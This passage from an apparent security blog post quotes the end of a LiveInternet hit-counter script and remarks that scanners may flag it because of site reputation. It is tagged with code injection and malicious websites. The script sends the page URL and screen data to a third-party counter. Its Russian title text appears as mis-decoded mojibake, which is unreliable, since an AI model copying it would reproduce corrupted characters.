screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.

Report, Security code injection, iframe, malicious websites